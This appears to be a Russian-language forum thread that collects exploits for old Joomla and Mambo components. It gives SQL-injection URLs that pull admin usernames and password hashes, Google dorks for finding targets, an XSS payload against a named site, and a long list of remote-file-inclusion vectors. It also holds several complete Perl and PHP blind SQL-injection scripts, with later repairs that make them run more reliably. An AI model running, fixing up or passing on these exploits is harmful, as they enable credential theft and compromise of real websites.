Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability Сайт разработчика : www.elearningforce.biz Сплоит : http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[код] (с) NoGe
Joomla: пассивная (отражённая) XSS в компоненте Traxartist. Уязвимость: index.php?option=com_traxartist&task=playSongex&id=1">[xss] Пример: Code: http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.coockie)</script> found by it's my
Joomla Component FlippingBook 1.0.4 SQL Injection DORK: inurl:com_flippingbook Exploit: Code: /index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/* (c)cO2 milw0rm.com Joomla Component Filiale v. 1.0.4 SQL Injection DORK: inurl:com_filiale Exploit: Code: /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10,11+from+jos_users (c)Str0xo milw0rm.com Joomla Component Profiler <= 1.0.1 Blind SQL Injection DORK: allinurl:com_comprofiler Exploit: Code: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/* (c)$hur!k'n milw0rm.com
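#!/usr/bin/perl
# Joomla Component PaxxGallery Blind SQL Injection Exploit ("more than 1 row")
# Original author: ZAMUT.  Dork: option=com_paxxgallery
#
# Vulnerable code (PHP, as quoted in the advisory):
#     global $database;
#     $id  = $_POST["id"];
#     $gid = $_POST["gid"];
#     if (isset($id)) { ... }
# Both parameters reach the query unfiltered; this PoC injects through gid=.
#
# Oracle: the injected sub-select is written so that a correct character
# guess makes MySQL raise "Subquery returns more than 1 row", which the
# page echoes back.  The hash is read character by character from the
# password column of jos_users (row id=62, as in the original PoC).
#
# Usage: run and paste the two halves of the vulnerable URL when prompted:
#   Url_Part_1: http://HOST/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
#   Url_Part_2: &iid=34
#
# Historical PoC (2008) kept for reference.  Only run against systems you
# are authorised to test.
use strict;
use warnings;
use LWP::Simple;

print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n";
print "-+-- \"more than 1 row\" --+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gid= --+-\n";
print "-+-- Dork: option=com_paxxgallery --+-\n";

print "Url_Part_1:";
chomp(my $ur1 = <STDIN>);
print "Url_Part_2:";
chomp(my $ur2 = <STDIN>);

# Candidate character codes: upper() is applied server-side, so only
# '0'..'9' and 'A'..'F' can ever match an MD5 hex digit.  The original loop
# kept counting past 'F' forever when nothing matched (and also when the
# request itself failed, since an undef response never matches); bounding
# the candidate set lets a miss be reported instead.
my @candidates = (48 .. 57, 65 .. 70);

my $result  = '';
my $request = 0;

POSITION:
for my $pos (1 .. 32) {
    my $found;
    for my $code (@candidates) {
        my $content = get(
            $ur1
            . '+and+1=(select+1+from+jos_users+where+length(if(ascii(upper(substring((select+password+from+jos_users+where+id=62),'
            . $pos . ',1)))=' . $code . ',password,id))>4)/*'
            . $ur2
        );
        $request++;
        # LWP::Simple::get returns undef on a transport/HTTP failure.
        die "Request failed (no response) at position $pos after $request requests\n"
            if !defined $content;
        # "doesn't exist" means the table/column guess is wrong: stop and
        # print whatever was recovered so far (same as the original).
        last POSITION if $content =~ /doesn't exist/;
        if ($content =~ /Subquery returns more than 1 row/) {
            $found = chr($code);
            last;
        }
    }
    if (!defined $found) {
        print "No candidate matched at position $pos; stopping.\n";
        last POSITION;
    }
    $result .= $found;
}

print "Administrator hash: " . $result . "\n";
print "REQUEST: " . $request;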
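#!/usr/bin/perl
#eSploit Framework - Inphex
# Joomla Component Webhosting (catid) Blind SQL Injection Exploit
# (cO2, Inphex; milw0rm.com 2008-05-01)
#
# What it does (from the code below): builds one GET request template for
#   index.php?option=com_webhosting&catid=<id> AND SUBSTRING((SELECT <column>
#   FROM <table> LIMIT 0,1),$h,1)=CHAR($i)
# then, for each position $h, tries every character code $i in 48..90 and
# treats the presence of $non_find (a string the operator knows appears on
# the page for a valid catid) in the response as "true".  Matched
# characters are printed lower-cased as they are found.
#
# Usage: perl webhosting.pl http://HOST /joomla/ <valid catid> "<string on page>"
#
# Historical PoC kept for reference; only run against systems you are
# authorised to test.
#
# Review notes (behaviour left unchanged except for the one FIX marked below):
#   * No strict/warnings; most state lives in package globals that the
#     nested subs share.
#   * sql_injection_blind() loops until its own termination test fires:
#     ($#ffs - 1) == $ffs compares an array index with the never-assigned
#     scalar $ffs (undef, numerically 0), so the loop exits after exactly
#     two sweeps over 48..90 regardless of progress.  Within one sweep only
#     characters with ascending codes can be found, so a value longer than
#     what two sweeps recover is truncated.
#   * get_d_p_s() appends to the globals @get/@post and $bb on every call and
#     never resets them; only the first call's result ($get_dA) feeds the
#     injected query, so this is wasted work rather than a wrong query.
#   * attack() is never reached with method_a = SQL_INJECTION_BLIND, the
#     exit() inside sql_injection_blind() means the "ok.html" write after
#     start() never runs, and %return is never populated anywhere.
#   * check() returns from inside its foreach on the first regex, so the
#     $h++ after the if/else is unreachable.
#   * Switch.pm is not core Perl (removed from core in 5.14); it must be
#     installed for this script to compile.
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;

# Positional arguments: base URL (with scheme), component path, a valid
# catid, and a string present on the page for that catid.
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet

# Attack descriptor consumed by start().
$info{'info'} = {
    "author" => ["cO2,Inphex"],
    "name" => ["Joomla com_webhosting Blind SQL Injection"],
    "version" => [],
    "description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
    "options" => {
        "agent" => "",
        "proxy" => "",
        "default_headers" => [ ["key","value"]],
        "timeout" => 2,
        "cookie" => {
            "cookie" => ["key=value"],
        },
    },
    "sending_options" => {
        "host" => $host_,
        # FIX: the original read `$path_".index.php"` -- a string literal
        # immediately after a variable with no operator between them, which
        # is a compile-time syntax error ("String found where operator
        # expected").  The intent is path + "index.php".
        "path" => $path_ . "index.php",
        "port" => 80,
        "method_a" => "SQL_INJECTION_BLIND",
        "attack" => {
            # Each entry: [where-to-send, parameter-name, value].  The
            # literal "$h" and "$i" in the catid value are placeholders that
            # modify() replaces with the current position and candidate code.
            "option" => ["get","option","com_webhosting"],
            "catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
            "regex" => [[$non_find]],
        },
    },
};

&start($info{'info'},222);

# Never reached: sql_injection_blind() calls exit(), and %return is never
# populated anywhere in this script (attack() stores under $a_->{$id}).
open FH,">>ok.html";
print FH $return{222}{'content'};

# Driver: unpacks the descriptor, configures the shared UserAgent, prints
# the descriptor's informational fields and dispatches on method_a.  All
# helper subs are nested here and share its lexicals and the globals.
sub start {
    $a_ = shift;
    $id = shift;
    # Both calls walk the "attack" hash; the "get" result is the query
    # template used by every probe.
    $get_dA = get_d_p_s("get");
    $post_dA = get_d_p_s("post");
    my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
    my $jj = 1;
    my $ii = 48;
    my $hh = 1;
    my $ppp = 0;
    my $s = shift;
    my $a = "";
    my $res_p = "";
    my $h = "";
    ($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
    $ua = LWP::UserAgent->new;
    $ua->timeout($a_->{'options'}{'timeout'});
    if ($a_->{'options'}{'proxy'}) {
        $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
    }
    $agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
    $ua->agent($agent);
    {
        # Print every top-level descriptor field except the two config
        # sections (e.g. "author:cO2,Inphex"), once per element of the field.
        while (($k,$v) = each(%{$a_})) {
            if ($k ne "options" && $k ne "sending_options") {
                foreach $r (@{$a_->{$k}}) {
                    if ($a_->{$k}[0]) {
                        print $k.":".$a_->{$k}[0]."\n";
                    }
                }
            }
        }
        # Static headers and cookie from the descriptor are attached to
        # every request the UserAgent sends.
        foreach $j (@{$a_->{'options'}{'default_headers'}}) {
            $ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
            $m++;
        }
        if ($a_->{'options'}{'cookie'}{'cookie'}[0]) {
            $ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
        }
    }
    switch ($method_m) {
        case "attack" { &attack();}
        case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
        case "REMOTE_COMMAND_EXECUTION" { &attack();}
        case "REMOTE_CODE_EXECUTION" {&attack();}
        case "REMOTE_FILE_INCLUSION" { &attack();}
        case "LOCAL_FILE_INCLUSION" { &attack(); }
        else { &attack(); }
    }

    # Generic single-shot request: sends the attack parameters once (GET,
    # or POST when post data exists), stores the body under
    # $a_->{$id}{'content'} and any numbered regex captures under
    # $a_->{$id}{'regex'}.  Not used by the SQL_INJECTION_BLIND method.
    sub attack {
        if ($post_dA eq "") {
            $method = "get";
        } elsif ($post_dA ne "") {
            $method = "post";
        }
        if ($method eq "get") {
            $res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
            ${$a_}{$id}{'content'} = $res_p;
            foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) {
                $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
                # ${$jj} is a symbolic reference to $1, $2, ... (no strict).
                while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) {
                    if (${$jj} ne "") {
                        ${$a_}{$id}{'regex'}[$h] = ${$jj};
                    }
                    $jj++;
                }
                $h++;
            }
        } elsif ($method eq "post") {
            $res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
            ${$a_}{$id}{'content'} = $res_p;
            foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) {
                $res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
                while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1]) {
                    if (${$jj} ne "") {
                        ${$a_}{$id}{'regex'}[$h] = ${$jj};
                    }
                    $jj++;
                }
                $h++;
            }
        }
    }

    # Character-by-character extraction.  $hh is the current 1-based
    # position, $ii the candidate code; a hit prints lc(chr($ii)) and moves
    # to the next position.  See the termination note in the file header.
    sub sql_injection_blind {
        syswrite STDOUT,$column.":";
        while () {
            while ($ii <= 90) {
                if(check($ii,$hh) == 1) {
                    syswrite STDOUT,lc(chr($ii));
                    $hh++;
                    $chr = $chr.chr($ii);
                }
                $ii++;
            }
            push(@ffs,length($chr));
            if (($#ffs -1) == $ffs) {
                print "\nFinished/Error\n";
                exit;
            }
            $ii = 48;
        }
    }

    # One probe for (code $ii, position $hh): substitutes the placeholders
    # into the query template, sends it and returns 1 when the first
    # "regex" entry ($non_find) matches the response, else 0.
    sub check($$) {
        $ii = shift;
        $hh = shift;
        if (get_d_p_s("post") ne "") {
            $method = "post";
        } else {
            $method = "get";
        }
        if ($method eq "get") {
            $ppp++;
            $query = modify($get_dA,$ii,$hh);
            $res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
            foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) {
                if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) {
                    return 1;
                } else {
                    return 0;
                }
                $h++;
            }
        } elsif ($method eq "post") {
            $ppp++;
            $query_g = modify($get_dA,$ii,$hh);
            $query_p = modify($post_dA,$ii,$hh);
            $res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
            foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}}) {
                if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/) {
                    return 1;
                } else {
                    return 0;
                }
                $h++;
            }
        }
    }

    # Replaces the literal placeholders "$i" (character code) and "$h"
    # (position) in $string.  Uses index()/rindex(), so the text between
    # the first and last occurrence of a placeholder is dropped; with one
    # occurrence each, as in this descriptor, that is a plain substitution.
    # When neither placeholder is present the string is only printed and
    # the sub falls off the end (returns print()'s result, not the string).
    sub modify($$$) {
        $string = shift;
        $replace_by = shift;
        $replace_by1 = shift;
        if ($string !~/\$i/ && $string !~/\$h/) {
            print $string;
        } elsif ($string !~/\$i/) {
            $ff = substr($string,0,index($string,"\$h"));
            $ee = substr($string,rindex($string,"\$h")+2);
            $string = $ff.$replace_by1.$ee;
            return $string;
        } elsif ($string !~/\$h/) {
            $f = substr($string,0,index($string,"\$i"));
            $e = substr($string,rindex($string,"\$i")+2);
            $string = $f.$replace_by.$e;
            return $string;
        } else {
            $f = substr($string,0,index($string,"\$i"));
            $e = substr($string,rindex($string,"\$i")+2);
            $string = $f.$replace_by.$e;
            $ff = substr($string,0,index($string,"\$h"));
            $ee = substr($string,rindex($string,"\$h")+2);
            $string = $ff.$replace_by1.$ee;
            return $string;
        }
    }

    # Builds the query string ("get"), post body ("post") or header hash
    # ("header") from the descriptor's "attack" entries.  @get/@post/$bb are
    # globals that accumulate across calls (see file header).
    sub get_d_p_s {
        $g_d_p_s = shift;
        $post_data = "";
        $get_data = "";
        $header_data = "";
        %header_dA = ();
        while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}})) {
            if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get") {
                $method = "get";
                push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
            } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post") {
                $method = "post";
                push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
            } elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header") {
                $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
            }
            $hp++;
        }
        # Parameters are joined in reverse push order, each followed by "&".
        $yy = $#get;
        while ($bb <= $#get) {
            $get_data .= $get[$yy]."&";
            $bb++;
            $yy--;
        }
        $l = $#post;
        while ($k <= $#post) {
            $post_data .= $post[$l]."&";
            $k++;
            $l--;
        }
        if ($g_d_p_s eq "get") {
            return $get_data;
        } elsif ($g_d_p_s eq "post") {
            return $post_data;
        } elsif ($g_d_p_s eq "header") {
            return %header_dA;
        }
    }

    # GET host.path and return the response body; "header" entries from the
    # descriptor are pushed onto the UserAgent's default headers first.
    sub get_data {
        $h_host_h_xdsjaop = shift;
        $h_path_h_xdsjaop = shift;
        %hash = get_d_p_s("header");
        while (($u,$c) = each(%hash)) {
            $ua->default_headers->push_header($u => $c);
        }
        $req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
        return $req->content;
    }

    # POST $send (with $content_type) to host.path and return the body.
    sub post_data {
        $h_host_h_xdsjaop = shift;
        $h_path_h_xdsjaop = shift;
        $content_type = shift;
        $send = shift;
        %hash = get_d_p_s("header");
        while (($u,$c) = each(%hash)) {
            $ua->default_headers->push_header($u => $c);
        }
        $req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
        $req->content_type($content_type);
        $req->content($send);
        $res = $ua->request($req);
        return $res->content;
    }
}
# milw0rm.com [2008-05-01] milw0rm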
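<?php
// Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
// Greets: all members of antichat.ru & cih.ms
//
// How it works (as far as this script shows): the User-Agent header is
// injected into the INSERT performed by
// components/com_datsogallery/sub_votepic.php.  A first request with the
// normal User-Agent seeds a row; every later request carries a payload whose
// IF() either re-selects that same User-Agent (-> "Duplicate entry" error,
// condition true) or selects from #__menu (-> "Subquery returns more than
// 1 row" error, condition false).  The MySQL error text leaked in the
// response is the boolean oracle.  #__ is Joomla's own prefix placeholder,
// so the real table prefix need not be known.
//
// This is a historical (2008) PoC meant to be run from the operator's own
// host: url=, user= and id= are taken from the query string unvalidated and
// used to open outbound connections and build the payload, so never expose
// it on a public web server.  Only use against systems you are authorised
// to test.
//
// Fixes over the original: <?php long tag, $pass initialised, the whole HTTP
// response is read (the original read only the first 4096 bytes, so the
// error string could be missed), and the two extraction loops start at the
// first real position (MySQL substring positions are 1-based, so position 0
// always returned '' and position 33 is the ':' separator that is appended
// by hand below; both cost 11 wasted requests each).

// options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua = 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url   = isset($_GET['url']) ? $_GET['url'] : '';
// user= is spliced into the injected SQL verbatim: it is part of the payload.
$where = (!empty($_GET['user'])) ? "where username='" . $_GET['user'] . "'" : 'limit 0,1';
$id    = (!empty($_GET['id'])) ? $_GET['id'] : '1';
$pass  = '';

// functions

/**
 * Send one vote request with $xpl as the User-Agent header and return the
 * raw HTTP response (status line, headers and body).
 * Assumes $url ends with "/" (the path is concatenated as-is) and plain HTTP
 * on port 80.
 */
function send_xpl($url, $xpl)
{
    global $id;
    $u = parse_url($url);
    $req  = "GET " . $u['path'] . "components/com_datsogallery/sub_votepic.php?id=$id&user_rating=1 HTTP/1.1\r\n";
    $req .= "Host: " . $u['host'] . "\r\n";
    $req .= "User-Agent: " . $xpl . "\r\n";
    $req .= "Connection: Close\r\n\r\n";
    $fs = fsockopen($u['host'], 80, $errno, $errstr, 30) or die("error: $errno - $errstr<br>\n");
    fwrite($fs, $req);
    // "Connection: Close" was requested, so the server ends the stream when
    // the response is complete; read all of it rather than one 4 KiB chunk.
    $res = '';
    while (!feof($fs)) {
        $res .= fread($fs, 4096);
    }
    fclose($fs);
    return $res;
}

/**
 * Build the User-Agent payload that tests "ascii(substring(password,$pos,1))
 * $condition" for the selected user ($condition is e.g. '>58' or '=97').
 * A random prefix keeps the vote row itself from colliding.
 */
function xpl($condition, $pos)
{
    global $norm_ua;
    global $where;
    $xpl = rand(1, 100000) . "'),(1,if(ascii(substring((select password from #__users $where),$pos,1))$condition,(select '$norm_ua'),(select link from #__menu)))/*";
    return $xpl;
}

// main
echo '<title>Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+</title>';
if (empty($url)) {
    die($_SERVER['SCRIPT_NAME'] . "?url=[url]&user=[username]&id=[pic_id]\n<br>username&pic_id - optional\n");
}
// Seed the row that later "true" probes will duplicate.
send_xpl($url, $norm_ua);

// get md5: positions 1..32; '>58' splits hex letters (a-f) from digits (0-9).
for ($i = 1; $i <= 32; $i++) {
    $buff = send_xpl($url, xpl('>58', $i));
    if (preg_match('/Duplicate entry/', $buff)) {
        for ($j = 97; $j <= 102; $j++) {
            if (preg_match('/Duplicate entry/', send_xpl($url, xpl('=' . $j, $i)))) {
                $pass .= chr($j);
                break;
            }
        }
    } elseif (preg_match('/Subquery returns more than 1 row/', $buff)) {
        for ($j = 48; $j <= 57; $j++) {
            if (preg_match('/Duplicate entry/', send_xpl($url, xpl('=' . $j, $i)))) {
                $pass .= chr($j);
                break;
            }
        }
    } else {
        die("exploit failed");
    }
}

// check Joomla version: a 32-character password means a bare MD5 (no salt
// suffix), so the hash is complete.
$test = rand(1, 100000) . "'),(1,if((select length(password) from #__users $where)=32,(select '$norm_ua'),(select link from #__menu)))/*";
$buff = send_xpl($url, $test);
if (preg_match('/Duplicate entry/', $buff)) {
    die($pass);
}

// separator
$pass .= ':';

// get salt: positions 34..49 (position 33 is the ':' just appended); the
// salt may contain digits, lower- and upper-case letters.
for ($i = 34; $i <= 49; $i++) {
    $buff = send_xpl($url, xpl('>58', $i));
    if (preg_match('/Duplicate entry/', $buff)) {
        $buff = send_xpl($url, xpl('>91', $i));
        if (preg_match('/Duplicate entry/', $buff)) {
            for ($j = 97; $j <= 122; $j++) {
                if (preg_match('/Duplicate entry/', send_xpl($url, xpl('=' . $j, $i)))) {
                    $pass .= chr($j);
                    break;
                }
            }
        } elseif (preg_match('/Subquery returns more than 1 row/', $buff)) {
            for ($j = 65; $j <= 90; $j++) {
                if (preg_match('/Duplicate entry/', send_xpl($url, xpl('=' . $j, $i)))) {
                    $pass .= chr($j);
                    break;
                }
            }
        } else {
            die("exploit failed");
        }
    } elseif (preg_match('/Subquery returns more than 1 row/', $buff)) {
        for ($j = 48; $j <= 57; $j++) {
            if (preg_match('/Duplicate entry/', send_xpl($url, xpl('=' . $j, $i)))) {
                $pass .= chr($j);
                break;
            }
        }
    } else {
        die("exploit failed");
    }
}
echo $pass;
// Author : +toxa+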
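#!/usr/bin/perl -w
#########################################################
# Joomla Component xsstream-dm 0.01 Beta Remote SQL Injection
#
# download : http://sstreamtv.com/index.php?option=com_docman&task=doc_details&gid=24
#########################################################
########################################
#[*] Founded by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Dork inurl:"index.php?option=com_xsstream-dm"
#[*] Greetz : CoNaN & HaCkeR_EgY & All friends & All muslims HaCkeRs :)
########################################
#[*] Script_Name: "Joomla"
#[*] Component_Name: "xsstream-dm" 0.01 Beta
########################################
#
# The movie= parameter of com_xsstream-dm is concatenated into a SQL query
# unfiltered.  A 22-column UNION SELECT puts the chosen jos_users column
# into the slot rendered as the page title; the username is then scraped
# from the contentpagetitle div and the hash matched as a 32-hex string.
#
# Usage: perl xsstream.pl http://victim.com/[joomla-root]
#
# Changes over the original: strict/warnings and lexical variables, a
# trailing slash on the base URL is accepted (the original produced
# "http://host//index.php"), and the URL is built by one helper.  All
# output strings are unchanged.
#
# Historical PoC (2008).  Only run against systems you are authorised to test.
use strict;
use warnings;
use LWP::UserAgent;

print "\t\t########################################################\n\n";
print "\t\t# Viva Islam #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Joomla Component (xsstream-dm) Remote SQL Injection #\n\n";
print "\t\t# by Houssamix & Stack-Terrorist #\n\n";
print "\t\t# from H-T Team & v4 Team #\n\n";
print "\t\t########################################################\n\n";

die "Example: perl $0 http://victim.com/\n" unless @ARGV;

# Column and table names of a default Joomla 1.0.x install (jos_ prefix);
# adjust if the target uses a different prefix.
my $user = "username";
my $pass = "password";
my $tab  = "jos_users";
my $un   = "/**/union/**/select/**/";
my $com  = "com_xsstream-dm&Itemid";

# Base URL with any trailing slash removed.
(my $base = $ARGV[0]) =~ s{/+\z}{};

my $ua = LWP::UserAgent->new() or die "Could not initialize browser\n";
$ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

# Injected URL with $column placed in the 3rd of the 22 UNION columns.
sub build_url {
    my ($column) = @_;
    return $base . "/index.php?option=" . $com . "=69&movie=-1" . $un
        . "1,2," . $column . ",4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/" . $tab . "/**";
}

my $answer = $ua->request(HTTP::Request->new(GET => build_url($user)))->content;
if ($answer =~ /<div class="contentpagetitle">(.*?)<\/div>/) {
    print "\n[+] Admin User : $1";
}

$answer = $ua->request(HTTP::Request->new(GET => build_url($pass)))->content;
# NOTE: any 32-hex string anywhere in the page matches, so a false positive
# is possible on pages that embed other hashes.
if ($answer =~ /([0-9a-fA-F]{32})/) {
    print "\n[+] Admin Hash : $1\n\n";
    print "\t\t# Exploit has ben aported user and password hash #\n\n";
} else {
    print "\n[-] Exploit Failed...\n";
}
# exploit discovered by Houssamix From H-T Team
# exploit exploited by Stack-Terrorist
# (c) by Houssamix & Stack-Terrorist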
Joomla Component com_galeria Remote SQL Injection Vulnerability Code: ############################################################### # # joomla SQL Injection(com_galeria) # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : [email protected] # ################################################################ # # DORK 1 : allinurl: "com_galeria" # # DORK 2 : allinurl: id "com_galeria" # ################################################################ EXPLOIT : index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/* ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################
Раскрытие префикса таблиц в компоненте datsogallery: если при обращении к странице возвращается цифра, то при повторном обращении к ней она вернёт ошибку SQL (в тексте которой виден префикс таблиц). Работает не на всех версиях. Пример: _http://www.sociotypes.ru/components/com_datsogallery/sub_votepic.php?id=1&user_rating=1
Эм... Как бы на этом и основан мой эксплойт =\ Только префикс у меня не играет роли, ибо #__ заменяется на текущий префикс при обработке запроса соответствующей функцией в Joomla.
Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability Code: ############################################################### # # joomla com_garyscookbook SQL Injection(id) # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : [email protected] # ################################################################ # # there are a lot of sites, but the exploit does not work for all of them; I found a lot # # DORK 1 : allinurl:"com_garyscookbook" # # DORK 2 : allinurl: com_garyscookbook "detail" # ################################################################ EXPLOIT : index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/* ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################ <name>garyscookbook</name> <creationDate>4-9-2005</creationDate> <author>Gerald Berger</author> <copyright>This component is released under the GNU/GPL License</copyright> <authorEmail>[email protected]</authorEmail> <authorUrl>www.vb-dozent.net</authorUrl> <version>1.1.1</version> <description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>
Нашёл у себя на компьютере; возможно, уже известное (баян). «Site Sonuna» (тур.) — «в конец адреса сайта», т.е. указанный путь дописывается к URL сайта. Векторы вида mosConfig_absolute_path=… / absolute_path=… — это RFI через перезапись конфигурационной переменной GET-параметром; как правило, они работают только при register_globals=On (и allow_url_fopen/allow_url_include для удалённого инклуда), т.е. на установках Mambo/Joomla 1.0.x того времени. Code: inurl:"com_flyspray" Site Sonuna: /components/com_flyspray/startdown.php?file=shell Google Dork: inurl:"com_admin" Site Sonuna: administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_simpleboard Site Sonuna: /components/com_simpleboard/file_upload.php?sbp=shell Google Dork: inurl:"com_hashcash" Site Sonuna: /components/com_hashcash/server.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_htmlarea3_xtd-c" Code: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_sitemap" Code: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_performs" Site Sonuna: components/com_performs/performs.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_forum" Site Sonuna: /components/com_forum/download.php?phpbb_root_path= Google Dork: inurl:"com_pccookbook" Site Sonuna: components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_extcalendar Site Sonuna: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell Google Dork: inurl:"minibb" Site Sonuna: components/minibb/index.php?absolute_path=shell Google Dork: inurl:"com_smf" Site Sonuna: /components/com_smf/smf.php?mosConfig_absolute_path= Site Sonuna2: /modules/mod_calendar.php?absolute_path=shell Google Dork: inurl:"com_pollxt" Site Sonuna: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_loudmounth" Site Sonuna: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_videodb" Site Sonuna: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shell Google Dork: inurl:index.php?option=com_pcchess Site Sonuna: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell Google Dork: 
inurl:"com_multibanners" Site Sonuna: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_a6mambohelpdesk" Site Sonuna: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shell Google Dork: inurl:"com_colophon" Site Sonuna: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mgm" Site Sonuna: administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_mambatstaff" Site Sonuna: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_securityimages" Site Sonuna: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell Site Sonuna2: /components/com_securityimages/lang.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_artlinks" Site Sonuna: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_galleria" Site Sonuna: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_akocomment" Site Sonuna: /akocomments.php?mosConfig_absolute_path=shell Google Dork: inurl:"com_cropimage" Site Sonuna: administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell Google Dork: inurl:"com_kochsuite" Site Sonuna: 